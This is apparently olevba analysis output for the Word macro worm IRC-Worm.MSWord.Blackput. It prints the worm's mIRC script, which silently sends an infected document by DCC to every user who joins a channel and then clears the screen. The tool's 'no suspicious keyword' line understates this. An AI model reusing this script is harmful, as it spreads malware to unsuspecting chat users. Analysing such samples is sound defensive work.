olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: IRC-Worm.MSWord.Blackput-dda89b830982392df7a348b148ac9166729a0929
Type: Text
-------------------------------------------------------------------------------
VBA MACRO IRC-Worm.MSWord.Blackput-dda89b830982392df7a348b148ac9166729a0929 
in file: IRC-Worm.MSWord.Blackput-dda89b830982392df7a348b148ac9166729a0929 - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[script]

n0=on 1:Join:#: {
n1=/if ($nick == $me ) {Halt}
n2=/DCC Send (c:\readme.txt.doc)
n3=/Clear
n4=/MOTD
n5=}
No suspicious keyword or IOC found.

